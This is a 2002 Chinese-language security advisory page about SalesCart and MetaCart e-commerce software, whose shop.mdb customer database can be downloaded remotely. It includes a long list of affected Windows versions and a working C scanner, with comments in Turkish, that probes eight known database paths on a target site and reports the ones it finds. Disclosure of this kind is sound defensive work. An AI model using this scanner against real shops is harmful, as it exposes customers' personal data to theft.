xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

SalesCart Shop.MDB客户数据库泄露漏洞


发布时间:2002-06-26
更新时间:2002-06-26
严重程度:
威胁程度:用户敏感信息泄露
错误类型:配置错误
利用方式:服务器模式

BUGTRAQ ID:5087

受影响系统
ComCity Corporation SalesCart Pro 1.0
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Terminal Services
   - Microsoft Windows 2000 Terminal Services SP1
   - Microsoft Windows 2000 Terminal Services SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT Enterprise Server 4.0
   - Microsoft Windows NT Enterprise Server 4.0 SP1
   - Microsoft Windows NT Enterprise Server 4.0 SP2
   - Microsoft Windows NT Enterprise Server 4.0 SP3
   - Microsoft Windows NT Enterprise Server 4.0 SP4
   - Microsoft Windows NT Enterprise Server 4.0 SP5
   - Microsoft Windows NT Enterprise Server 4.0 SP6
   - Microsoft Windows NT Enterprise Server 4.0 SP6a
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6
   - Microsoft Windows NT Server 4.0 SP6a
   - Microsoft Windows NT Terminal Server 4.0
   - Microsoft Windows NT Terminal Server 4.0 SP1
   - Microsoft Windows NT Terminal Server 4.0 SP2
   - Microsoft Windows NT Terminal Server 4.0 SP3
   - Microsoft Windows NT Terminal Server 4.0 SP4
   - Microsoft Windows NT Terminal Server 4.0 SP5
   - Microsoft Windows NT Terminal Server 4.0 SP6
   - Microsoft Windows NT Terminal Server 4.0 SP6a
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0 SP1
   - Microsoft Windows NT Workstation 4.0 SP2
   - Microsoft Windows NT Workstation 4.0 SP3
   - Microsoft Windows NT Workstation 4.0 SP4
   - Microsoft Windows NT Workstation 4.0 SP5
   - Microsoft Windows NT Workstation 4.0 SP6
   - Microsoft Windows NT Workstation 4.0 SP6a
   - Microsoft Windows XP Home
   - Microsoft Windows XP Professional
ComCity Corporation SalesCart Pro 1.5
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Terminal Services
   - Microsoft Windows 2000 Terminal Services SP1
   - Microsoft Windows 2000 Terminal Services SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT Enterprise Server 4.0
   - Microsoft Windows NT Enterprise Server 4.0 SP1
   - Microsoft Windows NT Enterprise Server 4.0 SP2
   - Microsoft Windows NT Enterprise Server 4.0 SP3
   - Microsoft Windows NT Enterprise Server 4.0 SP4
   - Microsoft Windows NT Enterprise Server 4.0 SP5
   - Microsoft Windows NT Enterprise Server 4.0 SP6
   - Microsoft Windows NT Enterprise Server 4.0 SP6a
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6
   - Microsoft Windows NT Server 4.0 SP6a
   - Microsoft Windows NT Terminal Server 4.0
   - Microsoft Windows NT Terminal Server 4.0 SP1
   - Microsoft Windows NT Terminal Server 4.0 SP2
   - Microsoft Windows NT Terminal Server 4.0 SP3
   - Microsoft Windows NT Terminal Server 4.0 SP4
   - Microsoft Windows NT Terminal Server 4.0 SP5
   - Microsoft Windows NT Terminal Server 4.0 SP6
   - Microsoft Windows NT Terminal Server 4.0 SP6a
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0 SP1
   - Microsoft Windows NT Workstation 4.0 SP2
   - Microsoft Windows NT Workstation 4.0 SP3
   - Microsoft Windows NT Workstation 4.0 SP4
   - Microsoft Windows NT Workstation 4.0 SP5
   - Microsoft Windows NT Workstation 4.0 SP6
   - Microsoft Windows NT Workstation 4.0 SP6a
   - Microsoft Windows XP Home
   - Microsoft Windows XP Professional
ComCity Corporation SalesCart Pro 3.0
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Terminal Services
   - Microsoft Windows 2000 Terminal Services SP1
   - Microsoft Windows 2000 Terminal Services SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT Enterprise Server 4.0
   - Microsoft Windows NT Enterprise Server 4.0 SP1
   - Microsoft Windows NT Enterprise Server 4.0 SP2
   - Microsoft Windows NT Enterprise Server 4.0 SP3
   - Microsoft Windows NT Enterprise Server 4.0 SP4
   - Microsoft Windows NT Enterprise Server 4.0 SP5
   - Microsoft Windows NT Enterprise Server 4.0 SP6
   - Microsoft Windows NT Enterprise Server 4.0 SP6a
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6
   - Microsoft Windows NT Server 4.0 SP6a
   - Microsoft Windows NT Terminal Server 4.0
   - Microsoft Windows NT Terminal Server 4.0 SP1
   - Microsoft Windows NT Terminal Server 4.0 SP2
   - Microsoft Windows NT Terminal Server 4.0 SP3
   - Microsoft Windows NT Terminal Server 4.0 SP4
   - Microsoft Windows NT Terminal Server 4.0 SP5
   - Microsoft Windows NT Terminal Server 4.0 SP6
   - Microsoft Windows NT Terminal Server 4.0 SP6a
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0 SP1
   - Microsoft Windows NT Workstation 4.0 SP2
   - Microsoft Windows NT Workstation 4.0 SP3
   - Microsoft Windows NT Workstation 4.0 SP4
   - Microsoft Windows NT Workstation 4.0 SP5
   - Microsoft Windows NT Workstation 4.0 SP6
   - Microsoft Windows NT Workstation 4.0 SP6a
   - Microsoft Windows XP Home
   - Microsoft Windows XP Professional
ComCity Corporation SalesCart-STD 1.2
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Terminal Services
   - Microsoft Windows 2000 Terminal Services SP1
   - Microsoft Windows 2000 Terminal Services SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT Enterprise Server 4.0
   - Microsoft Windows NT Enterprise Server 4.0 SP1
   - Microsoft Windows NT Enterprise Server 4.0 SP2
   - Microsoft Windows NT Enterprise Server 4.0 SP3
   - Microsoft Windows NT Enterprise Server 4.0 SP4
   - Microsoft Windows NT Enterprise Server 4.0 SP5
   - Microsoft Windows NT Enterprise Server 4.0 SP6
   - Microsoft Windows NT Enterprise Server 4.0 SP6a
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6
   - Microsoft Windows NT Server 4.0 SP6a
   - Microsoft Windows NT Terminal Server 4.0
   - Microsoft Windows NT Terminal Server 4.0 SP1
   - Microsoft Windows NT Terminal Server 4.0 SP2
   - Microsoft Windows NT Terminal Server 4.0 SP3
   - Microsoft Windows NT Terminal Server 4.0 SP4
   - Microsoft Windows NT Terminal Server 4.0 SP5
   - Microsoft Windows NT Terminal Server 4.0 SP6
   - Microsoft Windows NT Terminal Server 4.0 SP6a
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0 SP1
   - Microsoft Windows NT Workstation 4.0 SP2
   - Microsoft Windows NT Workstation 4.0 SP3
   - Microsoft Windows NT Workstation 4.0 SP4
   - Microsoft Windows NT Workstation 4.0 SP5
   - Microsoft Windows NT Workstation 4.0 SP6
   - Microsoft Windows NT Workstation 4.0 SP6a
   - Microsoft Windows XP Home
   - Microsoft Windows XP Professional
ComCity Corporation SalesCart-STD 2.0
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Terminal Services
   - Microsoft Windows 2000 Terminal Services SP1
   - Microsoft Windows 2000 Terminal Services SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT Enterprise Server 4.0
   - Microsoft Windows NT Enterprise Server 4.0 SP1
   - Microsoft Windows NT Enterprise Server 4.0 SP2
   - Microsoft Windows NT Enterprise Server 4.0 SP3
   - Microsoft Windows NT Enterprise Server 4.0 SP4
   - Microsoft Windows NT Enterprise Server 4.0 SP5
   - Microsoft Windows NT Enterprise Server 4.0 SP6
   - Microsoft Windows NT Enterprise Server 4.0 SP6a
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6
   - Microsoft Windows NT Server 4.0 SP6a
   - Microsoft Windows NT Terminal Server 4.0
   - Microsoft Windows NT Terminal Server 4.0 SP1
   - Microsoft Windows NT Terminal Server 4.0 SP2
   - Microsoft Windows NT Terminal Server 4.0 SP3
   - Microsoft Windows NT Terminal Server 4.0 SP4
   - Microsoft Windows NT Terminal Server 4.0 SP5
   - Microsoft Windows NT Terminal Server 4.0 SP6
   - Microsoft Windows NT Terminal Server 4.0 SP6a
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0 SP1
   - Microsoft Windows NT Workstation 4.0 SP2
   - Microsoft Windows NT Workstation 4.0 SP3
   - Microsoft Windows NT Workstation 4.0 SP4
   - Microsoft Windows NT Workstation 4.0 SP5
   - Microsoft Windows NT Workstation 4.0 SP6
   - Microsoft Windows NT Workstation 4.0 SP6a
   - Microsoft Windows XP Home
   - Microsoft Windows XP Professional
详细描述
SalesCart是设计集成Microsoft FrontPage的在线购物电子商务系统。

SalesCart没有充分的保证客户信息,用户访问站点,输入个人信息的资料全部存储在shop.mdb文件中,而这个文件可以通过远程用户直接访问获得。

测试代码
/* Salescart ve Metacart kullanILan bir alI$veri$ sitesindeki mu$teri
kayItLarInI bulma */

/* tacettinkaradeniz@yahoo.com    karadenizeregli@2002
  */

/* I LoVe CiLeK :>

/* Not: Bu programI ba$tan sona ben yazmadIm. Sadece
gerekli yerlerde
degi$iklik yaparak istediGim duzene getirdim :> */

#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>



void main(int argc, char *argv[])
{

  char *bulunan;
  char tampon[1024];
  char mesaj[] = "200";
  int toplam=0;
  int sayac;
  int buldum=0;
  char shoptampon[20];
  char *tmp[10];
  char *hata[10];


  int sock;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long giris;
  unsigned long duzelt;


tmp[1]="GET /fpdb/shop.mdb HTTP/1.0\n\n";
tmp[2]="GET /shoponline/fpdb/shop.mdb HTTP/1.0\n\n";
tmp[3]="GET /database/metacart.mdb HTTP/1.0\n\n";
tmp[4]="GET /shopping/database/metacart.mdb
HTTP/1.0\n\n";
tmp[5]="GET /shop/database/metacart.mdb HTTP/1.0\n\n";
tmp[6]="GET /metacart/database/metacart.mdb
HTTP/1.0\n\n";
tmp[7]="GET /mcartfree/database/metacart.mdb
HTTP/1.0\n\n";
tmp[8]="GET /ASP/cart/database/metacart.mdb
HTTP/1.0\n\n";

hata[1] = "/fpdb/shop.mdb  ";
hata[2] = "/shoponline/fpdb/shop.mdb  ";
hata[3] = "/database/metacart.mdb  ";
hata[4] = "/shopping/database/metacart.mdb  ";
hata[5] = "/shop/database/metacart.mdb  ";
hata[6] = "/metacart/database/metacart.mdb  ";
hata[7] = "/mcartfree/database/metacart.mdb  ";
hata[8] = "/ASP/cart/database/metacart.mdb  ";



if (argc<2)
  {
system("clear");
printf("\n\t _                     ");
printf("\n\t|_  ._   _    _   |  o ");
printf("\n\t|_  |   (/_  (_|  |  | ");
printf("\n\t              _|       ");
printf("\n\nSalescart - Metacart  (c) 2002 ");
printf("\nKullanImI : %s www.xxxshopxyz.com
\n\n",argv[0]);

exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
system("clear");
printf("\n\t _                     ");
printf("\n\t|_  ._   _    _   |  o ");
printf("\n\t|_  |   (/_  (_|  |  | ");
printf("\n\t              _|       ");
printf("\n\t  Salescart - Metacart  (c) 2002 ");

giris=inet_addr(argv[1]);

duzelt=ntohl(giris);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
send(sock, "HEAD / HTTP/1.0\n\n",17,0);

recv(sock, tampon, sizeof(tampon),0);
printf("%s",tampon);
close(sock);
system("clear");
printf("Tarama YapILIyor..\n\n");

while(toplam++ < 8)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}

for(sayac=0;sayac < 20;sayac++)
{
shoptampon[sayac] = '\0';
}

send(sock, tmp[toplam],strlen(tmp[toplam]),0);
recv(sock, shoptampon, sizeof(shoptampon),0);

bulunan = strstr(shoptampon,mesaj);

if( bulunan != NULL)
{
printf("%s : ",hata[toplam]);
printf(" Oleyyy.. Bulundu :\)\n");++buldum;
}
close(sock);
}

if (buldum)
{
printf("\n Tarama isLemi %s web sistesi icin
bitti.\n", argv[1]);
}
else printf ("\n Uzgunum tarama sonucu bir veri
bulunamamIstIr...\n\n");

}

解决方案
对shop.mdb文件进行访问控制设置

相关信息
Tacettin Karadeniz <tacettinkaradeniz@yahoo.com>
相关主页:http://www.salescart.com/
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved